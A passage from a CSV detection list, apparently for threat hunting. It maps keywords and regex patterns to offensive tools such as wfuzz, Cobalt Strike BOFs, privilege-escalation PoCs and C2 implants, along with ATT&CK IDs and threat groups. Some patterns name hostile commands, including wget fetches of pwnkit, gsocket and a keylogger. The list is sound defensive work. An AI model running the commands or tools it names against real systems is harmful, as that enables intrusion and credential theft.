security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*",".{0,1000}wevtutil\sqe\ssecurity\s\/format\:text\s\/q\:.{0,1000}Event\[System\[\(EventID\=4624\)\].{0,1000}find\s.{0,1000}Source\sNetwork\sAddress.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62462" "*wfencode -*",".{0,1000}wfencode\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62507" "*wfencode -e *",".{0,1000}wfencode\s\-e\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62508" 
"*wfencode.bat*",".{0,1000}wfencode\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62509" "*wfencode.py*",".{0,1000}wfencode\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62510" "*wfpayload -*",".{0,1000}wfpayload\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62511" "*wfpayload.bat*",".{0,1000}wfpayload\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62512" "*wfpayload.py*",".{0,1000}wfpayload\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62513" "*WfpEscalation.exe*",".{0,1000}WfpEscalation\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","62514" "*WfpTokenDup.exe -*",".{0,1000}WfpTokenDup\.exe\s\-.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62515" "*WfpTokenDup.exe*",".{0,1000}WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62516" "*wfuzz --*.txt*",".{0,1000}wfuzz\s\-\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62517" "*wfuzz.bat*",".{0,1000}wfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62518" 
"*wfuzz.get_payload*",".{0,1000}wfuzz\.get_payload.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62519" "*wfuzz.py*",".{0,1000}wfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62520" "*wfuzz.wfuzz*",".{0,1000}wfuzz\.wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62521" "*wfuzz/wordlist*",".{0,1000}wfuzz\/wordlist.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62522" "*wfuzz-cli.py*",".{0,1000}wfuzz\-cli\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62523" "*wfuzzp.py*",".{0,1000}wfuzzp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62524" 
"*wgen.py*",".{0,1000}wgen\.py.{0,1000}","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","N/A","2","122","35","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z","62525" "*wget *http-vuln-cve2020-5902.nse*",".{0,1000}wget\s.{0,1000}http\-vuln\-cve2020\-5902\.nse.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62526" "*wget http* -O pwnkit*",".{0,1000}wget\shttp.{0,1000}\s\-O\spwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","62527" "*wget -qO- gsocket.io*",".{0,1000}wget\s\-qO\-\sgsocket\.io.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","62530" "*wget* -O les.sh*",".{0,1000}wget.{0,1000}\s\-O\sles\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","62531" "*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*",".{0,1000}wget.{0,1000}\/drapl0n\/DuckyLogger\/blob\/main\/xinput\\\?raw\=true.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","62533" "*Wh04m1001/DFSCoerce*",".{0,1000}Wh04m1001\/DFSCoerce.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","62536" "*wh0amitz/BypassCredGuard*",".{0,1000}wh0amitz\/BypassCredGuard.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","62537" 
"*wh0amitz/KRBUACBypass*",".{0,1000}wh0amitz\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","62538" "*wh0amitz/PetitPotato*",".{0,1000}wh0amitz\/PetitPotato.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","62539" "*wh0amitz/S4UTomato*",".{0,1000}wh0amitz\/S4UTomato.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","62540" "*wh0amitz/SharpADWS*",".{0,1000}wh0amitz\/SharpADWS.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","62541" "*wh0amitz/SharpRODC*",".{0,1000}wh0amitz\/SharpRODC.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","62542" 
"*Wh1t3Fox/polenum*",".{0,1000}Wh1t3Fox\/polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62543" "*WhatBreach*",".{0,1000}WhatBreach.{0,1000}","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. 
To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Reconnaissance","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","N/A","10","1262","180","2024-10-22T18:52:55Z","2019-04-19T20:40:19Z","62544" "*whatlicense-main.zip*",".{0,1000}whatlicense\-main\.zip.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62545" "*Where do you want to store PDF C2 output *",".{0,1000}Where\sdo\syou\swant\sto\sstore\sPDF\sC2\soutput\s.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","62548" "*whereami.cna*",".{0,1000}whereami\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","62549" "*whereami.x64*",".{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","62550" "*WheresMyImplant.cs*",".{0,1000}WheresMyImplant\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62551" "*WheresMyImplant.git*",".{0,1000}WheresMyImplant\.git.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62552" "*WheresMyImplant.sln*",".{0,1000}WheresMyImplant\.sln.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62553" "*while * do mv *GCONV_PATH=./value* done",".{0,1000}while\s.{0,1000}\sdo\smv\s.{0,1000}GCONV_PATH\=\.\/value.{0,1000}\sdone","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034 ","1","0","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","62555" "*Whirlpool-Orig-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Orig\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62556" "*Whirlpool-Tweak-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Tweak\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62557" "*Whisker.DSInternals*",".{0,1000}Whisker\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62558" "*Whisker.DSInternals.*",".{0,1000}Whisker\.DSInternals\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62559" "*Whisker.DSInternals.*",".{0,1000}Whisker\.DSInternals\..{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62560" "*Whisker.exe*",".{0,1000}Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62561" "*whiskeysaml.py*",".{0,1000}whiskeysaml\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","62562" "*whiskeysamlandfriends*",".{0,1000}whiskeysamlandfriends.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","62563" "*Whitecat18/Rust-for-Malware-Development*",".{0,1000}Whitecat18\/Rust\-for\-Malware\-Development.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","62564" 
"*WhiteOakSecurity/GoAWSConsoleSpray*",".{0,1000}WhiteOakSecurity\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","62565" "*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*",".{0,1000}whoami\s\/priv\s\|\sfindstr\s\/i\s\/C\:.{0,1000}SeImpersonatePrivilege.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62569" "*whoami /user*",".{0,1000}whoami\s\/user.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","62571" "*whoami.nim*",".{0,1000}whoami\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","62574" "*whoami.py*",".{0,1000}whoami\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - 
